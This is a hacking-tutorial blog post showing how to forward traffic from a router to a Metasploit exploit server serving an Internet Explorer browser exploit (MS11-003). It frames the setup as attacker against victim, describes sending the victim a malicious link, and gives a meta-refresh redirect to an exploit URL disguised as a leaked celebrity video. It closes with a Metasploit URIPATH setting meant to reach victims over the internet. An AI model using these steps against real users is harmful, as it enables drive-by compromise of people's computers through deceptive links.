Type : Tips and Trick
Level : Easy – Medium
UPDATE : This tips and trick can only work on Local Area Network with 2 different network address, not on WAN. Sorry about it…but if you still want to read it down, you can continue.
This tips and trick "How to Port Forward Browser Exploit From Router to Your Exploit Server" I believe it will be useful for some of you who still confused about port redirection; BTW you can view my previous tutorial about port redirection on Windows in this page http://www.hacking-tutorial.com/hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/.
On that post, there’s a comment from Nikos that ask how to forward from a router to your exploit server? I believe when he ask this maybe he’s a little confused with the URIPATH (it’s something like http://192.168.1.2/URIPATH), because if you use the SPI port forward on my previous post you can’t forward a web address, what you can do is only forward an IP address followed by port number (e.g : 192.168.1.5:8080) without any URIPATH.
Let’s start it…
1. Apache Web Server (this already bundled with Backtrack)
Here’s the topology for this case :
Victim (Windows XP SP3) IP address : 192.168.8.93
Attacker Router (Windows 7 SP1) IP address : 192.168.8.89
Exploit Server / Attacker (Backtrack 5 R2) IP address : 192.168.8.91
1. Okay here’s the scene : Exploit server or we can call it attacker he send some malicious link to victim via e-mail or messenger, etc. Attacker has a router with public IP address and his computer was using a local IP address(192.168.8.91).
2. The picture below is what attacker do on his router to forward every incoming packet to port 80 to his computer local ip address on port 80.
3. I use the exploit for this tips and trick from this hacking tutorial (http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/) but I change the SRVPORT options to default on port 8080. As you can see on the picture below, I’ve already start the exploit server to listen for every incoming connection.
4. With this condition, if victim try to access 192.168.8.89 he will see nothing or even an error page. It’s because the attacker router can forward the packet that come to port 80 and forward it to 192.168.8.91 port 80, but on exploit server port 80 wasn’t active and we need to activate it.
You can activate the apache web server by run this command on your terminal :
5. But the above command on step 4 it will result the following page on victim web browser :
hey where’s the exploit??it’s a default apache page…
6. Because our exploit server was run on 192.168.8.91:8080/avril-video-leaked.avi not on port 80 so we need to redirect it to the proper location. here’ the step :
Open your terminal (CTRL + ALT + T) and type :
to edit the default index.html page; and then add the following code :
<meta http-equiv="refresh" content="0;url=http://192.168.8.91:8080/avril-video-leaked.avi" />
to redirect the default index.html page to our exploit server (see picture below).
Press CTRL + O to save and press CTRL + X to quit.
7. Now every request page to attacker apache default server will be redirected to exploit server.
8. Why not give a try on your own machine?
Hope it’s useful 🙂
1. Will this method redirect it correctly to my exploit server?
Answer : Yes of course if you set it correctly
2. Above this post you give an update that this method only work for network with 2 network address…how if I want to do it from WAN / INTERNET?
Answer : Make sure while you set up URIPATH you add an empty string like this
set URIPATH ""
so your router (see step 2) can forward directly every incoming packet to your exploit server.